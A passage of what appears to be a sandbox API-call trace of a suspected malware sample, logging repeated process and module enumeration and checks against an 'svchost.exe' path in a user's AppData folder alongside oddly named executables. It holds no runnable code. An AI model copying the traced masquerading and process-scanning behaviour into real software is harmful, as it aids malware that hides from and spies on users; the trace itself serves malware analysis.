(normalized: "c:\\windows\\system32\\pnpts.dll")) returned 0x1d [0077.464] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef92a0000, lpmodinfo=0x2472968, cb=0x18 | out: lpmodinfo=0x2472968*(lpBaseOfDll=0x7fef92a0000, SizeOfImage=0x1d000, EntryPoint=0x7fef92a1a28)) returned 1 [0077.468] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef92a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="radardt.dll") returned 0xb [0077.471] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef92a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\radardt.dll" (normalized: "c:\\windows\\system32\\radardt.dll")) returned 0x1f [0077.476] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefbb00000, lpmodinfo=0x2474b28, cb=0x18 | out: lpmodinfo=0x2474b28*(lpBaseOfDll=0x7fefbb00000, SizeOfImage=0x11000, EntryPoint=0x7fefbb01070)) returned 1 [0077.479] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefbb00000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WTSAPI32.dll") returned 0xc [0077.483] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefbb00000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WTSAPI32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")) returned 0x20 [0077.486] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef97b0000, lpmodinfo=0x2476cf8, cb=0x18 | out: lpmodinfo=0x2476cf8*(lpBaseOfDll=0x7fef97b0000, SizeOfImage=0x74000, EntryPoint=0x7fef97b66f0)) returned 1 [0077.490] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef97b0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="netprofm.dll") returned 0xc [0077.494] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef97b0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")) returned 0x20 [0077.497] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefb3f0000, lpmodinfo=0x2478ec8, cb=0x18 | out: lpmodinfo=0x2478ec8*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0077.501] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0077.506] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefb3f0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0077.509] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd070000, lpmodinfo=0x247b088, cb=0x18 | out: lpmodinfo=0x247b088*(lpBaseOfDll=0x7fefd070000, SizeOfImage=0x18000, EntryPoint=0x7fefd073b48)) returned 1 [0077.513] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd070000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0077.517] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd070000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTSP.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")) returned 0x1f [0077.521] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefcd70000, lpmodinfo=0x247d248, cb=0x18 | out: lpmodinfo=0x247d248*(lpBaseOfDll=0x7fefcd70000, SizeOfImage=0x47000, EntryPoint=0x7fefcd71064)) returned 1 [0077.524] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefcd70000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0077.528] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefcd70000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")) returned 0x1e [0077.532] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefa5d0000, lpmodinfo=0x247f408, cb=0x18 | out: lpmodinfo=0x247f408*(lpBaseOfDll=0x7fefa5d0000, SizeOfImage=0xc000, EntryPoint=0x7fefa5d602c)) returned 1 [0077.536] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="npmproxy.dll") returned 0xc [0077.540] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefa5d0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")) returned 0x20 [0077.544] GetModuleInformation (in: hProcess=0x218, hModule=0x7fef9200000, lpmodinfo=0x24815f0, cb=0x18 | out: lpmodinfo=0x24815f0*(lpBaseOfDll=0x7fef9200000, SizeOfImage=0xd000, EntryPoint=0x7fef9206fb0)) returned 1 [0077.548] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fef9200000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wdiasqmmodule.dll") returned 0x11 [0077.552] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fef9200000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\wdiasqmmodule.dll" (normalized: "c:\\windows\\system32\\wdiasqmmodule.dll")) returned 0x25 [0077.555] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd1e0000, lpmodinfo=0x24837d0, cb=0x18 | out: lpmodinfo=0x24837d0*(lpBaseOfDll=0x7fefd1e0000, SizeOfImage=0x22000, EntryPoint=0x7fefd1e5d30)) returned 1 [0077.559] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0077.563] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd1e0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")) returned 0x1e [0077.568] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefdc80000, lpmodinfo=0x2485990, cb=0x18 | out: lpmodinfo=0x2485990*(lpBaseOfDll=0x7fefdc80000, SizeOfImage=0x1d7000, EntryPoint=0x7fefdc81010)) returned 1 [0077.572] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefdc80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="SETUPAPI.dll") returned 0xc [0077.576] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefdc80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SETUPAPI.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")) returned 0x20 [0077.580] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd980000, lpmodinfo=0x2487b60, cb=0x18 | out: lpmodinfo=0x2487b60*(lpBaseOfDll=0x7fefd980000, SizeOfImage=0x1a000, EntryPoint=0x7fefd981558)) returned 1 [0077.584] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd980000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="DEVOBJ.dll") returned 0xa [0077.589] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd980000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\DEVOBJ.dll" (normalized: "c:\\windows\\system32\\devobj.dll")) returned 0x1e [0077.593] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd830000, lpmodinfo=0x2489d20, cb=0x18 | out: lpmodinfo=0x2489d20*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0077.597] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0077.601] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0077.606] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd9e0000, lpmodinfo=0x248bef0, cb=0x18 | out: lpmodinfo=0x248bef0*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0077.610] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0077.614] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd9e0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0077.618] GetModuleInformation (in: hProcess=0x218, hModule=0x7fefd820000, lpmodinfo=0x248e4c8, cb=0x18 | out: lpmodinfo=0x248e4c8*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0077.622] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x7fefd820000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0077.627] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x7fefd820000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0077.632] CloseHandle (hObject=0x218) returned 1 [0077.643] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.643] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x218 [0077.643] EnumProcessModules (in: hProcess=0x218, lphModule=0x2492090, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2492090, lpcbNeeded=0x23ee40) returned 1 [0077.643] GetModuleInformation (in: hProcess=0x218, hModule=0xb80000, lpmodinfo=0x2492300, cb=0x18 | out: lpmodinfo=0x2492300*(lpBaseOfDll=0xb80000, SizeOfImage=0x17000, EntryPoint=0xb814a1)) returned 1 [0077.644] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.644] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xb80000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="commercial.exe") returned 0xe [0077.644] CoTaskMemFree (pv=0xd94a00) [0077.644] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.644] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xb80000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Windows Mail\\commercial.exe" (normalized: "c:\\program files (x86)\\windows mail\\commercial.exe")) returned 0x32 [0077.645] CoTaskMemFree (pv=0xd94a00) [0077.645] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x2494528, cb=0x18 | out: lpmodinfo=0x2494528*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.645] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.645] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.646] CoTaskMemFree (pv=0xd94a00) [0077.646] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.646] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.647] CoTaskMemFree (pv=0xd94a00) [0077.647] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24966e8, cb=0x18 | out: lpmodinfo=0x24966e8*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.647] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.647] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.648] CoTaskMemFree (pv=0xd94a00) [0077.648] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.648] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.649] CoTaskMemFree (pv=0xd94a00) [0077.649] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24988a8, cb=0x18 | out: lpmodinfo=0x24988a8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.649] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.649] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.650] CoTaskMemFree (pv=0xd94a00) [0077.650] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.650] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.651] CoTaskMemFree (pv=0xd94a00) [0077.651] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x249aa78, cb=0x18 | out: lpmodinfo=0x249aa78*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.651] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.651] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.652] CoTaskMemFree (pv=0xd94a00) [0077.652] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.652] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.653] CoTaskMemFree (pv=0xd94a00) [0077.653] CloseHandle (hObject=0x218) returned 1 [0077.655] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.655] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xba0) returned 0x218 [0077.655] EnumProcessModules (in: hProcess=0x218, lphModule=0x249d198, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x249d198, lpcbNeeded=0x23ee40) returned 1 [0077.656] GetModuleInformation (in: hProcess=0x218, hModule=0x930000, lpmodinfo=0x249d408, cb=0x18 | out: lpmodinfo=0x249d408*(lpBaseOfDll=0x930000, SizeOfImage=0x17000, EntryPoint=0x9314a1)) returned 1 [0077.656] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.656] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x930000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="operamail.exe") returned 0xd [0077.657] CoTaskMemFree (pv=0xd94a00) [0077.657] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.657] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x930000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft.NET\\operamail.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\operamail.exe")) returned 0x32 [0077.657] CoTaskMemFree (pv=0xd94a00) [0077.657] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x249f648, cb=0x18 | out: lpmodinfo=0x249f648*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.658] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.658] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.658] CoTaskMemFree (pv=0xd94a00) [0077.658] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.658] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.659] CoTaskMemFree (pv=0xd94a00) [0077.659] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24a1808, cb=0x18 | out: lpmodinfo=0x24a1808*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.661] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.661] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.661] CoTaskMemFree (pv=0xd94a00) [0077.661] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.661] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.662] CoTaskMemFree (pv=0xd94a00) [0077.662] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24a39c8, cb=0x18 | out: lpmodinfo=0x24a39c8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.662] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.662] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.663] CoTaskMemFree (pv=0xd94a00) [0077.663] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.663] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.664] CoTaskMemFree (pv=0xd94a00) [0077.664] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24a5b98, cb=0x18 | out: lpmodinfo=0x24a5b98*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.664] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.665] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.665] CoTaskMemFree (pv=0xd94a00) [0077.665] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.665] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.666] CoTaskMemFree (pv=0xd94a00) [0077.666] CloseHandle (hObject=0x218) returned 1 [0077.667] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.668] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x218 [0077.668] EnumProcessModules (in: hProcess=0x218, lphModule=0x24a82b8, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24a82b8, lpcbNeeded=0x23ee40) returned 1 [0077.668] GetModuleInformation (in: hProcess=0x218, hModule=0xb50000, lpmodinfo=0x24a8528, cb=0x18 | out: lpmodinfo=0x24a8528*(lpBaseOfDll=0xb50000, SizeOfImage=0x17000, EntryPoint=0xb514a1)) returned 1 [0077.669] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.669] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xb50000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="mxslipstream.exe") returned 0x10 [0077.669] CoTaskMemFree (pv=0xd94a00) [0077.669] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.669] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xb50000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\mxslipstream.exe" (normalized: "c:\\program files\\windows sidebar\\mxslipstream.exe")) returned 0x31 [0077.670] CoTaskMemFree (pv=0xd94a00) [0077.670] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24aa758, cb=0x18 | out: lpmodinfo=0x24aa758*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.670] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.670] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.671] CoTaskMemFree (pv=0xd94a00) [0077.671] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.671] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.671] CoTaskMemFree (pv=0xd94a00) [0077.671] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24ac918, cb=0x18 | out: lpmodinfo=0x24ac918*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.672] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.672] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.673] CoTaskMemFree (pv=0xd94a00) [0077.673] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.673] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.673] CoTaskMemFree (pv=0xd94a00) [0077.673] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24aead8, cb=0x18 | out: lpmodinfo=0x24aead8*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.674] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.674] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x752a0000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0077.674] CoTaskMemFree (pv=0xd94a00) [0077.675] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.675] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x752a0000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0077.675] CoTaskMemFree (pv=0xd94a00) [0077.675] GetModuleInformation (in: hProcess=0x218, hModule=0x75290000, lpmodinfo=0x24b0ca8, cb=0x18 | out: lpmodinfo=0x24b0ca8*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0077.676] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.676] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75290000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0077.677] CoTaskMemFree (pv=0xd94a00) [0077.677] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.677] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75290000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0077.677] CoTaskMemFree (pv=0xd94a00) [0077.678] CloseHandle (hObject=0x218) returned 1 [0077.679] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0077.679] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x574) returned 0x218 [0077.679] EnumProcessModules (in: hProcess=0x218, lphModule=0x24b33e0, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x24b33e0, lpcbNeeded=0x23ee40) returned 1 [0077.680] GetModuleInformation (in: hProcess=0x218, hModule=0xd70000, lpmodinfo=0x24b3650, cb=0x18 | out: lpmodinfo=0x24b3650*(lpBaseOfDll=0xd70000, SizeOfImage=0x17000, EntryPoint=0xd714a1)) returned 1 [0077.680] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.680] GetModuleBaseNameW (in: hProcess=0x218, hModule=0xd70000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="afr38.exe") returned 0x9 [0077.681] CoTaskMemFree (pv=0xd94a00) [0077.681] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.681] GetModuleFileNameExW (in: hProcess=0x218, hModule=0xd70000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Internet Explorer\\afr38.exe" (normalized: "c:\\program files (x86)\\internet explorer\\afr38.exe")) returned 0x32 [0077.681] CoTaskMemFree (pv=0xd94a00) [0077.681] GetModuleInformation (in: hProcess=0x218, hModule=0x77830000, lpmodinfo=0x24b5870, cb=0x18 | out: lpmodinfo=0x24b5870*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0077.682] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.682] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x77830000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0077.682] CoTaskMemFree (pv=0xd94a00) [0077.682] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.682] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x77830000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0077.683] CoTaskMemFree (pv=0xd94a00) [0077.683] GetModuleInformation (in: hProcess=0x218, hModule=0x75300000, lpmodinfo=0x24b7a30, cb=0x18 | out: lpmodinfo=0x24b7a30*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0077.683] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.683] GetModuleBaseNameW (in: hProcess=0x218, hModule=0x75300000, lpBaseName=0xd94a00, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0077.684] CoTaskMemFree (pv=0xd94a00) [0077.684] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.684] GetModuleFileNameExW (in: hProcess=0x218, hModule=0x75300000, lpFilename=0xd94a00, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0077.685] CoTaskMemFree (pv=0xd94a00) [0077.685] GetModuleInformation (in: hProcess=0x218, hModule=0x752a0000, lpmodinfo=0x24b9bf0, cb=0x18 | out: lpmodinfo=0x24b9bf0*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0077.685] CoTaskMemAlloc (cb=0x804) returned 0xd94a00 [0077.685] GetModuleBaseNameW (in: 